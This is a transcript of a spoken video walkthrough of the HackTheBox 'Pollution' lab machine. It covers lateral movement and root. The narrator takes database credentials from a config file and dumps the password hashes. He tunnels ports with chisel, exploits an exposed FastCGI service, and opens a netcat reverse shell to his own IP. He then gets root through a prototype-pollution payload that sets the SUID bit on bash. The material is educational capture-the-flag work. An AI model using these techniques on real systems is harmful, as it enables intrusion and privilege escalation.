Well, hello everyone, welcome back guys. Hope you all are doing well. This is part 2 of pollution machine from Hackthebox. The machine difficulty level is hard. We already covered the section 1 or part 1 where we get the initial foothold as www data user, and we know now that there are two users left, which is those are Victor and the root user. So now let's go and we will do some lateral movement and we will see that what information we will get which is important for us. So let's go, and the first thing first, I'm going to see how many ports are open on the local machine. So net state space -tlpn, and there are a bunch of ports open. This information is very important, and I am seeing some very useful information. So I'm going here in my notes and put this is the result for that. The interesting port, port number 9000, port number 3306. This is default for MySQL. So I will go and I will try to find out the database connection string inside any configuration file. Mostly we will get that in the config.php. This is for Redis. We already use that, and this one also hosted locally. So three important ports: 9000, 3306 and 3000. So first thing first, I want to see on in which directory we are. So we are inside var www developers ls space -la, and there are a bunch of files there. Let's see what's inside index.php, and this file actually we already read before. Let's do clear here. So export term is equal to xterm, and now hopefully we will execute clear command. Yes. Let's go one directory back and ls space -la. Right now we are inside var www, and inside var www there are three directories. Collect, this is for collect application, which is this one, collect.htb. There is one developer, this is for developer side, which is here, we already open it, and the third one is forum. So we already read files from the developers. Next is collect and forum. So there is one more subdomain, which is forum, from where we found the proxy file here for the pollution.api, this file. So I would like to see the forum first. cd forum ls space -la. There are a lot of php file. The thing is, we saw there is MySQL port is open, right? MySQL port is open, and in the applications we are using credentials, username and password, and there are chats and all of these. So maybe this data is going to saved in a database, and the database is going to be MySQL. So keep all these things in mind. I'm going to see if I found any database password here, because we are www data. So if inside forum, I'm going to say grep space -irn, and let's find out if there is any string containing password. Hit enter, and there are too much. So go up, and from here let's start. Just wait a moment. Okay, password protected. Oh no, nothing there. Scroll down. I'm going to scroll down from here. Okay, username password combination, and there is one inc config.php, and here, as you can see, there is a password. So this is most important information, and this is what we are looking for. So I'm going to copy this, come back here to our notes and paste that here. Now I would like to see this whole file. So we are already inside forum, cd inc ls space -la, and there are too many files, and within these files and folders we found here config.php. So cat config.php, and scroll up. Sorry, there is the thing. So I'm going to copy this and come back here, paste that here. Fine. So the type is MySQL I, the database name is forum, and the table prefix is this mybb underscore, and the table name is going to be after this string. Like if the table name is let's say authentication, so the complete table name is going to be mybb underscore authentication. If the table name is users, so the complete table name is going to be mybb underscore users, and this is the username and this is the password. So let's go and log in with this. Clear that MySQL space hyphen capital D, database name is going to be forum, so forum forum space hyphen u, and username is going to be this web app underscore user space hyphen p. Hit enter. It's asking for the password, and there is your password. So copy that and paste it here, hit enter, and we are in. Because of some terminal issues or compatibility, we are not able to see here the terminal, but it will work. So we are already inside the forum database. So let's see how many tables are there. First of all, I want to see show databases. So it is not going to show us the result. Once we exit, then it will show us the result. Show tables. The tables we are looking for is from the forum database, right? Hit enter and then exit. So once we exit, we found here all the queries we ran before. So for the databases, these are the databases. Okay. So there are developers, forum, information schema. This is default MySQL, performance schema, default pollution API is there, and web app is there. And we also executed the query for the show tables for the forum database, and we saw the prefix is mybb underscore. This is the prefix. So after prefix, whatever the name, this is the complete table name. So I'm interested in mybb underscore users. So again, I'm going to connect with this, paste selection, hit enter, and our password is here. So copy this, come back here, paste the password, hit enter. So now what I want to see, first of all, we are inside the forum table. I want to see describe mybb underscore users. This is the complete table name. So I want to see the columns. Okay, so exit again, and these are all the columns inside the table mybb underscore users. So UID, username, password, salt, login key. What I want to execute here, first of all, let's scroll up, and again I want to execute this. Oh, come on. Okay, now the password, we already have it here. Okay, so select, we need first of all UID, comma username, comma password, and we need salt, and we need login key. That's it. From mybb underscore users colon, and exit. So once we exit, we will be able to see all the usernames and their passwords with the salt, but the passwords are hashed password with salt, so it is a bit difficult to whenever the salt is included, it is a bit difficult to crack the passwords. I already tried to crack the password. I would recommend you to to try to crack these passwords. But no luck for me. Maybe you will be able to get the password for Victor user, right? So I'm not going to show you here the cracking process because I did not find any password, but you can try. So I will move forward, and what I will try, I will go back to the net state space -tlpn result, and there is 9000 port open. So first of all, I want to see what's running on port 9000, and for that I'm going to make the port forwarding, because this 9000 port is locally published, not for the public. Okay, so it is published for localhost only. So I'm going to clear this and cd/opt/chisel /all, and here we have a chisel. So I'm going to say start the Python HTTP server, and here I'm going to move to the dev shm, and here I'm going to say wget http:// my IP is 10.10.14.143/chisel. So it's completed. Now I'm going to make chmod +x, and let's say chisel clear. Here I'm going to start the chisel server. So for this I'm going to say chisel mode is server, and I want to start this server on port 9595, and then I want to say reverse. Okay, hit enter, and its server is listening for the connection or for the client. Here I'm going to say chisel, the mode is going to be client, and connecting with the server, which is my IP on port 9595, and then I want to make the reverse connection for port number 9000 on this local machine to port number 9000 for the target, for the hacker machine, right? So now it's connected, and now we will be able to get this. So now I don't want the proxy here. Let's try to access this port, which is 9000:9000. Let's see if we find something, and there is nothing, but we can try a bunch of things. Let's do one more terminal here, +++, nc space -nv on port number 9000, no, 127.0.0.1 on port 9000. Let's see. So the port is open, but we don't know what service is running on it. So the best thing what we are looking for is what service is running on this port. So nmap space -p on port number 9000, and the target IP is our local IP because the port is forwarded to the target on port 9000. So now we can see the service here is CS listener, and the port is open, and I exactly do not know what this service is all about. So come back here, Google is your best friend at this moment, and I'm going to say CS listener port 9000. Let's see what is this. Okay, and there is one link that redirects us to the hack tricks, and that's saying pen testing fast CGI, common gateway interface. Let's see, I'm going to open this. I don't need that. Okay, so there is basic information. If you want to go and read more about PHP, FPM and fast CGI, you can go and read here. There is one vulnerability which is remote code execution, and if you want to exploit that, there is a bash script to exploit that. And there is also one Python script, so I would like to go to this Python script. To save the time, I already have this, and I save this file as fastcgi_exploit.py. So I'm just going to execute that. Fine. So let's try how we can execute. So Python 3 fastcgi_exploit, hit enter. So this is the usage of this fastcgi, this script. So we need to mention what we need to mention. First of all, host. So host is going to be this, then space -p for port. So port is 9000, and then it's saying file, any file. So file, let's say I'm going to say where www/developers/index.php, right? And then it's saying with space -c switch we can specify any command, and the command is about PHP. So it should be like this as we did before. So let's say id, the first command I want to execute is this, and as you can see the remote code execution is working properly, and we have now the result of id command, and now we are the victor user. So that means we can get the reverse shell. So for reverse shell I want to go to revshells.com. Here I just need to specify 14.143. this is my IP on, let's say, port number 9001. leave it as it is. We want netcat, so take this, copy, come back here, and in the new tab I'm going to listen for this space -nlvp on 9001 port. Okay, back here, and this time what I want to execute is this. Okay, hit enter, hope for the best, come back here, and here we have the session. So who am I? We are victor user. Now which Python 3, yeah, there is Python 3. So Python 3 space -c for the command. I want to import the module which is pty:/pty.spawn, and I want to get the bin bash, hit enter, and now the terminal is good. Now we also need to execute clear command more times, and for this we need export term is equal to xterm. Now we can also execute clear command. So now we are victor users, that's perfectly fine, and I want to go to the users home directory and list the files and directory. Here we have our first flag, so cat user.txt, this is going to be our first flag. Okay, now the important part here is this pollution API, because a lot of time here even we found I have problem in pollution API, and we found this file here. Where is it? This one, proxy history. Okay, so I want to see this pollution API directory. I'm going to clear it, cd pollution_API directory, ls space -la, and this is the complete API directory, and we have here all the files and folders. We have roots, we have controllers, functions, everything. So I would like to first go to see index.js. So cat index.js, and in index.js we found what? This application is running on port number, is published on port number 3000, which is locally published. Fine, so we can access this by accessing this URL. So curl and paste that. Let's see what's running on it, and we have some message. Okay, so status is okay, message is read documentation from API / documentation. Fine. I want to also see the roots, because here you can see there is authentication, root client roots admin. Okay, so here what we found here an endpoint which is set role admin, this one. And what we did, we make our normal user to the admin user, and we get into the administration section of the API. So here we register a user named as API_user, and this user is for API user. So this user is existing, and let's come back here. So I want to see this roots. So cd roots, list the files and directories. There is admin.js and authentication.js and documentation.js too. So first of all, first thing first, admin.js. And in admin.js, express, it needs this is the model user, and decode JWT token. That means it is once you make login, it is going to generate a JWT token. Okay, here it is decoding the JWT token, and after that it is going to send a message. But before that, it is going to see whether this header exists in the request or not. Fine. So if this header exists in the request, then it is going to decode the JWT token. This is the header, and it is going to find out the username from the token. So once it's decode the JWT token, it will fetch the username from the decoded parameters like username. Whatever the value of username, it is going to be the username, and the role of the user is going to be fetched from the JWT token. So that means what we found here, that in JWT token, in the second section, in the data section or in the payload section, there are two fields. The first one is username, and the second one is the role of the user. And then it's saying if the length is greater than 0, and it's matching the username. If the username is equal to the username exists in the token, and the role of the user exists from the token, okay, and the token, in the token, the role must be admin. Only then you can get in. Otherwise, it is going to say error message, you are not allowed. So only admin is allowed, and you are not allowed, you are not allowed, you are not allowed. Okay, so this is the thing. So we already have username, we already have the access for the database, and we already created a user here. That means we need to log into the username, and we have to access the database and then change the role of this username to the admin. We need to change the role of this user to admin. Storage. Okay, that's fine. So the first thing, we need to make port forward again for the port 3000, right? So let's close this, clear, and this time again listen on port number 7575, close this, clear, and cd/desktop pollution, and here we need to start the server, and again go back to the developer, and let's just, we are listening, right? let's see, just refresh this. If the session is still valid, we will get the reverse shell. No, the session is expired. So now we will have here, this is from the previous part. We need to take this session ID, go back here in the Redis, and we just need to change what? We just need to change here the session ID. What was that? Paste that, the new one, hit enter, and let's try. We need to take this out, hit enter, and yes. Okay, the second thing is we need to execute PHP fast PHP filter. So this is copy this back here, instead of home just paste that, hit enter, and we should have shell here. Yeah, we have shell here now. So that's it. Now we already have cd/dev/shm. Inside shm we already have export term is equal to xterm clear ls space -la. We already have chisel here. Okay, so let's execute chisel again, and here I'm going to say cd/opt/chisel all, chisel server on the same port, and here let's chisel client 10.10.14.143. this is my IP on port 9595. chisel server is listening, and then this time I want to port forward 3000, right? So 3000 on the local host on port 3000, forward it on 3000, connecting, and now it's connected. Fine. Now let's try to see what exactly running on that port. I don't need this. Come back here, http:// and 127.0.0.1 on port 3000. Okay, so if we go here, go to the proxy, this is the request and this is the response. Back here there are endpoints /auth and /admin. So if we try here /admin, you are not allowed, of course. Inspect, is there anything? Nothing. Let's say auth, cannot get it. I also want to see inside auth, ls space -la, there is authcat auth.js. Okay, user root signature token, it needs token. In the token we found this endpoint. This is very important. I would like to see this functions /jwt. So there is one endpoint which is register the user and another endpoint to login. So let's try inside auth /register. Or only register. Let's see, and there is login. So auth /login, and there is nothing. Come back here, register, send this request to the repeater, go to the repeater, and let's put here content type is application/JSON. Let's see this. One more thing, because it is inside the JSON, so we can try to put here username and username. Let's say the user we created is API_user, right, comma, and the password was one two three four five six. That was the password. Let's try again. Okay, now you can see there is error. Bad request. Just wait a moment. This is the post request, right? So change request to post. Content type, this one is going to be JSON, and again username is going to be API_user, and password is going to be 123456. Let's send this. Again there is bad request, and I think the bad request is because we also need to add here the access token. Let's see, let's do it from the curl. Horizontal curl http://127.001:3000/earth/login, and let's put here a header. Let's say header, because it needs content type must be JSON. Application/JSON, and let's put here data, which is going to be username is API_user, comma, password should be 123456. Okay, hit enter, and here as you can see status okay, header is this. And if we found here the good one, I want to go let's say proxy is going to be http://127.001:8080. this is the IP address for our burp suite. Hit enter, and let's go to the burp suite, go to the proxy, and this is the post request, and now this is the actual request, and here we get the JWT token. So I would like to copy this, come back here, jwt.io. I don't need burp suite now. Come back here, paste that token, and here as you can see the username is API, is earth is true, and the role is user. Now we need to change this user role to admin. So go back here to the terminal, and let's clear from here MySQL space -u, and the username was webapp_user, I think, space -p, and the password we already have here. this is the password. So copy this back here, paste that, hit enter. Now we are in show databases, and there is pollution underscore API. So use this pollution API database colon. Now we are in show tables, and there is user table. So describe users, because I want to see the columns. So ID, username, password, role, create, date, and this. So select username comma password from users. So there is one user exist, API underscore user, and the password is 123456. Actually, I should also select username comma role comma password from users. So the role is user. Now I want to change this role. So I'm going to say update users, and I want to say set the field name is role. So role is equal to, let's say I want to put admin instead of user, where username is equal to API underscore user. I created this user, right? Hit enter. One row gets changed, and now if I again execute this, so you can see now I am admin. So once I am admin, go back here and let's execute this one more time. This is the JWT token, right? We found from here. So Control C, back here, paste that. Now you can see in the JWT token, which is generated, it's generated with the role admin. I want to see one more thing. Clear ls space -la. There is client cd ... list again. There are controllers. Let's see what's inside controllers. Message and message.js. So cd controllers. Okay, message.js and message send.js. So cat messages.js. Okay, find map, request body ID, JSON parse, message.text, and the second file is message send.js. Cat message send.js. Paste this, and this is a bit different. It's decoding JWT token, and it is going to see the access token, which contains the JWT value, and decode that token. Then it will take the username, and message for admin is going to be the title. Okay, this is actually constructing the message, and it is merging the message and the request body. And here the problem exists, because it is going to execute this, and here also it is going to it's using json.stringify. Fine. And it's going to execute this log.sh. Fine, and sending this message to log message. So inside pollution API there is log.sh. So I'm going back, and let's see what's inside log.sh. So everything it is going to send here in the log. Very well. This is actually prototype. Prototype pollution. This is the vulnerability what we saw up to now. Okay. Prototype pollution, this link, you can go anywhere. I will actually see example and tutorial, this one also. So AVIL function, we already found one AVIL function there, which is exec. JSON parse, something like this. You can see here JSON.parse, JSON.stringify. Okay, this is useful, but sync will be more better. So you can see you can construct like this, which we will do in a minute. Okay, the role is equal to admin, it's passing the data here. We will pass username and password and other data. Prototype. So I would highly recommend you guys to please read this whole content. Because of less time, I'm not going to read and explain everything here. Come back here, and let's start turn on the burp intercept. Come back here and let's try to auth/login. Okay, and send this request to the repeater. Okay, and come back to the repeater, change this URI. Okay, and here I'm going to say /admin /message messages/send. This is the endpoint we saw, right? And let's put here anywhere, let's say here x access token, and put its value as JWT. So last JWT we found this one with the admin, so paste it here, or we can generate one more here. Come on, intercept off and put this one, this JWT, because JWT tokens have expiry time, so I don't want to put the expire token. This is the right token. Let's see here, content type application/JSON, and now send this request. Okay, no problem, but here we need to construct the data. Okay, so come back here. Okay, so here let's say text, and its value is going to be constructor, and then its value is going to be, let's say, prototype, and its value again is going to be shell colon slash proc slash self slash exe for execution, and then arg, which is argument 0. Its value is going to be console dot log, and that's going to be, it's requiring the child process dot exe dot exec sync, and now here we can execute any command we want. So let's do one thing, change mode plus x plus s, and let's say user slash bin slash bash. Okay, and we are going to say make it into a string, node underscore options, and this option is going to be require proc slash self slash cmd line, command line. Okay, so this is going to be your text message. So copy. Now you can send this message whether as data here, okay, or you can send one thing you need to make sure that this should be the post request. Let's see, hit enter. Back here, this is ls space hyphen la slash user slash bin slash bash. SUID bit is not set up to now because the session maybe has gone. So copy, come back here, change this token, paste that, and hit enter. That seems okay. Let's see here, ls space hyphen la slash bin slash bash. Still not. ls space hyphen la user bin bash. Paste this. Let's see what, maybe there is some problem. Constructor prototype shell is okay, argument 0, child process executing change mode plus s, because I want to put the, oh come on, that is the bad thing. Now let's try one more time. Copy this back here again, and instead of that, paste this, send it again. Let's generate one more token and put this, control C, put this token here and execute this. If we cannot see status okay, that means it's not working. So text, which is I'm going to say constructor, creating constructor, prototype, shell proc self exec, argument is going to be console.log, require child underscore process, okay, user slash bin slash bash dot to string. Let's, there is also a problem. Send it again. No. Okay. No, this one also having issue. Okay, that seems perfect. Now here also we need to put here, because all of this is in the JSON format, which required this. Send this again. Yeah, and this time status is okay. That means if we come here, clear this, ls space -la slash user slash bin slash bash, and the SUID bit is set. So that's it. Just we need what? We need bash space -p, and let's execute who am I, and we are root. So if we do ID, so here you can see we are root. Now cd slash root, clear that, ls space -la, there is root.text, and we need cat root.text. So this is your root flag, and that's it. We exploited the complete machine up to the root user, and we have all the privileges on this target machine. So that's it for this video. If you like the content, please like, subscribe and share, and I'm going to see you in the next video. Bye.